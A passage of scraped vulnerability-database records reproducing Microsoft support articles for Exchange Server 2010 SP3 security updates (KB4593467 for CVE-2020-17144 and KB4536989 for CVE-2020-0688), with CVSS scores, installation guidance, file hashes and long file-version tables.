\nSmimeoptions.aspx| Not applicable| 10,805| 11-Nov-2020| 21:23| Not applicable \nSmimeparameterstandalone.js| Not applicable| 10,566| 11-Nov-2020| 21:21| Not applicable \nSmtpreceiveperfcounters.h| Not applicable| 1,014| 11-Nov-2020| 21:20| Not applicable \nSmtpreceiveperfcounters.ini| Not applicable| 11,910| 11-Nov-2020| 21:24| Not applicable \nSmtpreceiveperfcounters.xml| Not applicable| 3,439| 11-Nov-2020| 21:24| Not applicable \nSmtpsendperfcounters.h| Not applicable| 739| 11-Nov-2020| 21:24| Not applicable \nSmtpsendperfcounters.ini| Not applicable| 8,488| 11-Nov-2020| 21:24| Not applicable \nSmtpsendperfcounters.xml| Not applicable| 2,527| 11-Nov-2020| 21:24| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 24,974| 11-Nov-2020| 21:21| Not applicable \nStartpage.aspx| Not applicable| 10,891| 11-Nov-2020| 21:23| Not applicable \nStartpage.js| Not applicable| 177,388| 11-Nov-2020| 21:20| Not applicable \nStopdagservermaintenance.ps1| Not applicable| 17,945| 11-Nov-2020| 21:21| Not applicable \nStore.exe| 14.3.509.0| 6,934,408| 11-Nov-2020| 21:23| x64 \nStoretsconstants.ps1| Not applicable| 15,592| 11-Nov-2020| 21:23| Not applicable \nStoretslibrary.ps1| Not applicable| 25,360| 11-Nov-2020| 21:23| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 14.3.498.0| 30,152| 11-Nov-2020| 21:20| x64 \nTokenm.dll| 14.3.498.0| 59,792| 11-Nov-2020| 21:20| x64 \nTranscodingservice.exe| 14.3.498.0| 123,840| 11-Nov-2020| 21:20| x64 \nTroubleshoot_ci.ps1| Not applicable| 24,397| 11-Nov-2020| 21:23| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 23,679| 11-Nov-2020| 21:23| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 29,026| 11-Nov-2020| 21:23| Not applicable \nUglobal.js| Not applicable| 984,109| 11-Nov-2020| 21:20| Not applicable \nUmservice.exe| 14.3.498.0| 140,192| 11-Nov-2020| 21:20| x86 \nUmworkerprocess.exe| 14.3.498.0| 50,080| 11-Nov-2020| 21:23| x86 \nUninstall_antispamagents.ps1| Not applicable| 14,965| 11-Nov-2020| 21:23| Not applicable \nUpdatecas.ps1| Not applicable| 18,846| 11-Nov-2020| 21:21| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 27,082| 11-Nov-2020| 21:21| Not applicable \nUview.js| Not applicable| 178,233| 11-Nov-2020| 21:20| Not applicable \nVlv.js| Not applicable| 140,614| 11-Nov-2020| 21:20| Not applicable \nVsacad.dll| 8.5.3.76| 14,228,832| 11-Nov-2020| 21:24| x64 \nVsacs.dll| 8.5.3.76| 41,824| 11-Nov-2020| 21:24| x64 \nVsami.dll| 8.5.3.76| 74,592| 11-Nov-2020| 21:24| x64 \nVsarc.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVsasf.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsbdr.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsbmp.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVscdrx.dll| 8.5.3.76| 22,880| 11-Nov-2020| 21:24| x64 \nVscgm.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVsdbs.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsdez.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsdif.dll| 8.5.3.76| 25,952| 11-Nov-2020| 21:24| x64 \nVsdrw.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsdx.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVsdxla.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64 \nVsdxlm.dll| 8.5.3.76| 80,224| 11-Nov-2020| 21:24| x64 \nVsemf.dll| 8.5.3.76| 64,864| 11-Nov-2020| 21:24| x64 \nVsen4.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64 \nVsens.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsenw.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVseps.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVseshr.dll| 8.5.3.76| 188,768| 11-Nov-2020| 21:24| x64 \nVsexe2.dll| 8.5.3.76| 53,088| 11-Nov-2020| 21:24| x64 \nVsfax.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsfcd.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsfcs.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsfft.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsflw.dll| 8.5.3.76| 154,464| 11-Nov-2020| 21:24| x64 \nVsfwk.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVsgdsf.dll| 8.5.3.76| 89,440| 11-Nov-2020| 21:24| x64 \nVsgif.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsgzip.dll| 8.5.3.76| 37,216| 11-Nov-2020| 21:24| x64 \nVshgs.dll| 8.5.3.76| 50,016| 11-Nov-2020| 21:24| x64 \nVshtml.dll| 8.5.3.76| 517,984| 11-Nov-2020| 21:24| x64 \nVshwp.dll| 8.5.3.76| 91,488| 11-Nov-2020| 21:24| x64 \nVshwp2.dll| 8.5.3.76| 111,968| 11-Nov-2020| 21:24| x64 \nVsich.dll| 8.5.3.76| 136,032| 11-Nov-2020| 21:24| x64 \nVsich6.dll| 8.5.3.76| 62,816| 11-Nov-2020| 21:24| x64 \nVsid3.dll| 8.5.3.76| 53,088| 11-Nov-2020| 21:24| x64 \nVsimg.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVsindd.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVsinx.dll| 8.5.3.76| 21,344| 11-Nov-2020| 21:24| x64 \nVsiwok.dll| 8.5.3.76| 36,704| 11-Nov-2020| 21:24| x64 \nVsiwok13.dll| 8.5.3.76| 1,409,384| 11-Nov-2020| 21:24| x64 \nVsiwon.dll| 8.5.3.76| 70,496| 11-Nov-2020| 21:24| x64 \nVsiwop.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsiwp.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsjbg2.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsjp2.dll| 8.5.3.76| 249,184| 11-Nov-2020| 21:24| x64 \nVsjw.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsleg.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64 \nVslwp7.dll| 8.5.3.76| 360,288| 11-Nov-2020| 21:24| x64 \nVslzh.dll| 8.5.3.76| 41,824| 11-Nov-2020| 21:24| x64 \nVsm11.dll| 8.5.3.76| 28,512| 11-Nov-2020| 21:24| x64 \nVsmanu.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsmbox.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsmcw.dll| 8.5.3.76| 44,384| 11-Nov-2020| 21:24| x64 \nVsmdb.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVsmif.dll| 8.5.3.76| 217,952| 11-Nov-2020| 21:24| x64 \nVsmime.dll| 8.5.3.76| 135,008| 11-Nov-2020| 21:24| x64 \nVsmm.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsmm4.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsmmfn.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsmp.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsmpp.dll| 8.5.3.76| 249,696| 11-Nov-2020| 21:24| x64 \nVsmsg.dll| 8.5.3.76| 96,096| 11-Nov-2020| 21:24| x64 \nVsmsw.dll| 8.5.3.76| 46,432| 11-Nov-2020| 21:24| x64 \nVsmwkd.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsmwks.dll| 8.5.3.76| 25,440| 11-Nov-2020| 21:24| x64 \nVsmwp2.dll| 8.5.3.76| 49,504| 11-Nov-2020| 21:24| x64 \nVsmwpf.dll| 8.5.3.76| 34,656| 11-Nov-2020| 21:24| x64 \nVsmwrk.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsnsf.dll| 8.5.3.76| 38,240| 11-Nov-2020| 21:24| x64 \nVsolm.dll| 8.5.3.76| 153,952| 11-Nov-2020| 21:24| x64 \nVsone.dll| 8.5.3.76| 81,760| 11-Nov-2020| 21:24| x64 \nVsow.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVspbm.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVspcl.dll| 8.5.3.76| 23,392| 11-Nov-2020| 21:24| x64 \nVspcx.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVspdf.dll| 8.5.3.76| 260,448| 11-Nov-2020| 21:24| x64 \nVspdfi.dll| 8.5.3.76| 278,368| 11-Nov-2020| 21:24| x64 \nVspdx.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVspfs.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64 \nVspgl.dll| 8.5.3.76| 59,744| 11-Nov-2020| 21:24| x64 \nVspic.dll| 8.5.3.76| 25,440| 11-Nov-2020| 21:24| x64 \nVspict.dll| 8.5.3.76| 55,136| 11-Nov-2020| 21:24| x64 \nVspng.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVspntg.dll| 8.5.3.76| 22,880| 11-Nov-2020| 21:24| x64 \nVspp12.dll| 8.5.3.76| 131,936| 11-Nov-2020| 21:24| x64 \nVspp2.dll| 8.5.3.76| 72,032| 11-Nov-2020| 21:24| x64 \nVspp7.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64 \nVspp97.dll| 8.5.3.76| 227,680| 11-Nov-2020| 21:24| x64 \nVsppl.dll| 8.5.3.76| 39,264| 11-Nov-2020| 21:24| x64 \nVspsd.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVspsp6.dll| 8.5.3.76| 189,792| 11-Nov-2020| 21:24| x64 \nVspst.dll| 8.5.3.76| 82,272| 11-Nov-2020| 21:24| x64 \nVspstf.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsqa.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsqad.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsqp6.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVsqp9.dll| 8.5.3.76| 76,128| 11-Nov-2020| 21:24| x64 \nVsqt.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsrar.dll| 8.5.3.76| 141,152| 11-Nov-2020| 21:24| x64 \nVsras.dll| 8.5.3.76| 24,416| 11-Nov-2020| 21:24| x64 \nVsrbs.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsrft.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsrfx.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsriff.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVsrtf.dll| 8.5.3.76| 171,872| 11-Nov-2020| 21:24| x64 \nVssam.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVssc5.dll| 8.5.3.76| 32,608| 11-Nov-2020| 21:24| x64 \nVssdw.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsshw3.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVssmd.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVssms.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVssmt.dll| 8.5.3.76| 33,632| 11-Nov-2020| 21:24| x64 \nVssnap.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsso6.dll| 8.5.3.76| 306,016| 11-Nov-2020| 21:24| x64 \nVssoc.dll| 8.5.3.76| 43,360| 11-Nov-2020| 21:24| x64 \nVssoc6.dll| 8.5.3.76| 285,536| 11-Nov-2020| 21:24| x64 \nVssoi.dll| 8.5.3.76| 40,800| 11-Nov-2020| 21:24| x64 \nVssoi6.dll| 8.5.3.76| 304,992| 11-Nov-2020| 21:24| x64 \nVssow.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsspt.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVsssml.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsswf.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVstaz.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVstext.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVstga.dll| 8.5.3.76| 26,976| 11-Nov-2020| 21:24| x64 \nVstif6.dll| 8.5.3.76| 103,776| 11-Nov-2020| 21:24| x64 \nVstw.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVstxt.dll| 8.5.3.76| 38,752| 11-Nov-2020| 21:24| x64 \nVsvcrd.dll| 8.5.3.76| 82,272| 11-Nov-2020| 21:24| x64 \nVsviso.dll| 8.5.3.76| 205,664| 11-Nov-2020| 21:24| x64 \nVsvsdx.dll| 8.5.3.76| 47,456| 11-Nov-2020| 21:24| x64 \nVsvw3.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsw12.dll| 8.5.3.76| 221,536| 11-Nov-2020| 21:24| x64 \nVsw6.dll| 8.5.3.76| 138,080| 11-Nov-2020| 21:24| x64 \nVsw97.dll| 8.5.3.76| 236,896| 11-Nov-2020| 21:24| x64 \nVswbmp.dll| 8.5.3.76| 22,368| 11-Nov-2020| 21:24| x64 \nVswg2.dll| 8.5.3.76| 47,968| 11-Nov-2020| 21:24| x64 \nVswk4.dll| 8.5.3.76| 103,264| 11-Nov-2020| 21:24| x64 \nVswk6.dll| 8.5.3.76| 154,464| 11-Nov-2020| 21:24| x64 \nVswks.dll| 8.5.3.76| 48,480| 11-Nov-2020| 21:24| x64 \nVswm.dll| 8.5.3.76| 30,048| 11-Nov-2020| 21:24| x64 \nVswmf.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVswml.dll| 8.5.3.76| 68,960| 11-Nov-2020| 21:24| x64 \nVsword.dll| 8.5.3.76| 86,880| 11-Nov-2020| 21:24| x64 \nVswork.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVswp5.dll| 8.5.3.76| 75,616| 11-Nov-2020| 21:24| x64 \nVswp6.dll| 8.5.3.76| 107,360| 11-Nov-2020| 21:24| x64 \nVswpf.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVswpg.dll| 8.5.3.76| 48,480| 11-Nov-2020| 21:24| x64 \nVswpg2.dll| 8.5.3.76| 57,184| 11-Nov-2020| 21:24| x64 \nVswpl.dll| 8.5.3.76| 39,264| 11-Nov-2020| 21:24| x64 \nVswpml.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVswpw.dll| 8.5.3.76| 68,448| 11-Nov-2020| 21:24| x64 \nVsws.dll| 8.5.3.76| 37,728| 11-Nov-2020| 21:24| x64 \nVsws2.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsxl12.dll| 8.5.3.76| 261,472| 11-Nov-2020| 21:24| x64 \nVsxl5.dll| 8.5.3.76| 289,632| 11-Nov-2020| 21:24| x64 \nVsxlsb.dll| 8.5.3.76| 244,064| 11-Nov-2020| 21:24| x64 \nVsxml.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsxmp.dll| 8.5.3.76| 22,368| 11-Nov-2020| 21:24| x64 \nVsxps.dll| 8.5.3.76| 51,552| 11-Nov-2020| 21:24| x64 \nVsxy.dll| 8.5.3.76| 35,680| 11-Nov-2020| 21:24| x64 \nVsyim.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVszip.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nWatson.config.xml| Not applicable| 37,834| 11-Nov-2020| 21:23| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 143,640| 11-Nov-2020| 21:22| Not applicable \nWeb.config_cb9a6ac9d1164e879b0b2887c9452d4f| Not applicable| 137,151| 11-Nov-2020| 21:23| Not applicable \nWebreadyview.aspx| Not applicable| 1,061| 11-Nov-2020| 21:23| Not applicable \nWebreadyviewbody.aspx| Not applicable| 1,292| 11-Nov-2020| 21:23| Not applicable \nWebreadyviewhead.aspx| Not applicable| 7,406| 11-Nov-2020| 21:23| Not applicable \nWizardproperties.js| Not applicable| 189,547| 11-Nov-2020| 21:20| Not applicable \nWizcmd.exe| 14.3.498.0| 22,992| 11-Nov-2020| 21:23| x86 \nWsbexchange.exe| 14.3.509.0| 124,304| 11-Nov-2020| 21:20| x64 \nWvcore.dll| 8.5.3.76| 3,251,040| 11-Nov-2020| 21:24| x64 \nX400prox.dll| 14.3.498.0| 98,192| 11-Nov-2020| 21:19| x64 \n_02bdcebd3d694db585f8e38f74a7767e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_083c0d59e0a749f2b10174c00cb6727e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_24d2e35f00d7423c902e58d04c126642_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_3184a6f4759943848cf58593791ac971_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_3539f8afe1684c36847f808f0c76d024_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_486632cb7cbe412b8a2954012f7e9c7f_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_50ca03193abf48aca295b3ec864fcd68_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_545db0f907844150956a0c069a3a0556_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_5e224a55a0fa465e817e18cec8854723_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_64f60ad194cd4344bca49df649ac7b36_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_68e440eb9ffa4b54b3d7490524f7f878_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_6b0d5c59049a498aa09173d08300a443_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_71a730c62e764989bd2b2d205dd874b4_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_756c11efe6574dba874273443609eb8b_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_791aef9789df465da46941ee38757a31_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_7b9793f8_5acd_4ef8_83a6_46e957c909a0_error.aspx| Not applicable| 8,363| 11-Nov-2020| 21:24| Not applicable \n_7e3dc44156954eacac20b5767cd0ebd7_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_81ebbb77ed854ee784951876098c52e9_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_9495e7eba02649c6a26bea7209a2f1e1_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_9e665be76e144ac89a7d8b37611b752e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n \nHow to get help and support for this security updateProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2010 Service Pack 3: December 8, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2020-12-08T08:00:00", "id": "KB4593467", "href": "https://support.microsoft.com/en-us/help/4593467", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:28:26", "description": "None\nThis update rollup is a security update that provides a security advisory in Microsoft Exchange. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688>)\nThis update also fixes the following issue:4540267 MSExchangeDelivery.exe or EdgeTransport.exe crashes in Exchange Server 2013 and Exchange Server 2010\n\n## Known issues in this security update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur when you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)](<http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107>)\n\n## Update detail information for Exchange Server 2010 SP3\n\n### Installation instructions for Exchange Server 2010 SP3\n\nLearn more about [how to install the latest update rollup for Exchange Server 2010](<http://technet.microsoft.com/library/ff637981.aspx>).Also, learn about the following update installation scenarios.\n\n## \n\n__\n\nInstall the update on computers that aren't connected to the internet\n\nWhen you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:\n\nCreating Native images for .Net assemblies.\n\nThis issue is caused by network requests to connect to the following website: \n[http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl](<http://crl.microsoft.com/pki/crl/products/codesigpca.crl>) \n \nThese network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue. \n \nTo fix this issue, follow these steps: \n\n\n 1. In Internet Explorer, select **Internet Options** on the **Tools** menu, and then select **Advanced**.\n 2. In the **Security** section, clear the **Check for publisher's certificate revocation** check box, and then select **OK**. \n \n**Note** Clear this security option only if the computer is in a tightly-controlled environment. \n 3. When the Setup process is finished, select the **Check for publisher's certificate revocation** check box again.\n\n## \n\n__\n\nInstall the update on computers that have customized Outlook Web App files\n\n**Important **Before you apply this update rollup, make a backup copy of any [customized Outlook Web App](<http://technet.microsoft.com/library/ee633483\\(exchg.140\\).aspx>) files. \n \nWhen you apply an update rollup package, the update process updates the Outlook Web App files, if this is required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.\n\n## \n\n__\n\nInstall the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying\n\nIf your scenario meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:\n\n * You're a CAS Proxy Deployment Guidance customer.\n * You have deployed [CAS-CAS proxying](<http://technet.microsoft.com/library/bb310763\\(exchg.140\\).aspx>).\n**Note **For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.\n\n## \n\n__\n\nInstall this update on a DBCS version of Windows Server 2012\n\nYou can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:\n\n 1. In Control Panel, select **Clock, Region and Language**, select **Region**, and then select **Administrative**.\n 2. In the **Language for non-Unicode programs** area, select **Change system locale**.\n 3. In the **Current system locale** list, select **English (United States)**, and then select **OK**.\nAfter you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.\n\nRestart requirementThe required services are restarted automatically after you apply this update rollup.Removal informationTo remove Update Rollup 30 for Exchange Server 2010 SP3, use the **Add or Remove Programs** item in Control Panel to remove update **KB4536989**.More informationSecurity update deployment informationFor deployment information about this update, see [security update deployment information: February 11, 2020](<https://support.microsoft.com/help/20200211>). Security update replacement informationThis security update replaces the following previously released update:\n\n * Description of the security update for Microsoft Exchange Server 2010: July 9, 2019\nFile informationFile hash informationUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nUpdate Rollup 30 for Exchange Server 2010| Exchange2010-KB4536989-x64-en.msp| 2DD3EB1C737743941FB56293BB9A68242F0F52E2| 95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4 \nExchange Server file informationThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nUpdate Rollup 30 for Exchange Server 2010\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nA33e7066a3f143ef8386e08c4458051d_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nAbv_dg.dll| 14.3.470.0| 898,992| 03-Jan-2020| 05:46| x64 \nAddreplicatopfrecursive.ps1| Not applicable| 13,837| 03-Jan-2020| 05:47| Not applicable \nAddressbook.aspx| Not applicable| 3,830| 03-Jan-2020| 05:49| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 13,465| 03-Jan-2020| 05:47| Not applicable \nAf46d2bd14db43e0b49619bd0eeb07ec_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nAggregatepfdata.ps1| Not applicable| 17,393| 03-Jan-2020| 05:47| Not applicable \nAirfilter.dll| 14.3.470.0| 49,584| 03-Jan-2020| 05:48| x64 \nAirsynctistateparser.dll| 14.3.470.0| 83,376| 03-Jan-2020| 05:48| x64 \nAjaxcontroltoolkit.dll| 14.3.470.0| 110,280| 03-Jan-2020| 05:48| x86 \nAlsperf.dll1| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| Not applicable \nAntispamcommon.ps1| Not applicable| 11,413| 03-Jan-2020| 05:46| Not applicable \nAsdat.msi| Not applicable| 5,083,136| 03-Jan-2020| 05:46| Not applicable \nAsentirs.msi| Not applicable| 73,728| 03-Jan-2020| 05:50| Not applicable \nAsentsig.msi| Not applicable| 73,728| 03-Jan-2020| 05:50| Not applicable \nAttachfiledialog.aspx| Not applicable| 5,346| 03-Jan-2020| 05:49| Not applicable \nAutodisc_web.config| Not applicable| 89,637| 03-Jan-2020| 05:49| Not applicable \nBasicaddressbook.aspx| Not applicable| 4,217| 03-Jan-2020| 05:49| Not applicable \nBasicattachmentmanager.aspx| Not applicable| 3,826| 03-Jan-2020| 05:49| Not applicable \nBasicautosaveinfo.aspx| Not applicable| 4,255| 03-Jan-2020| 05:49| Not applicable \nBasiccalendaritemschedulingtab.aspx| 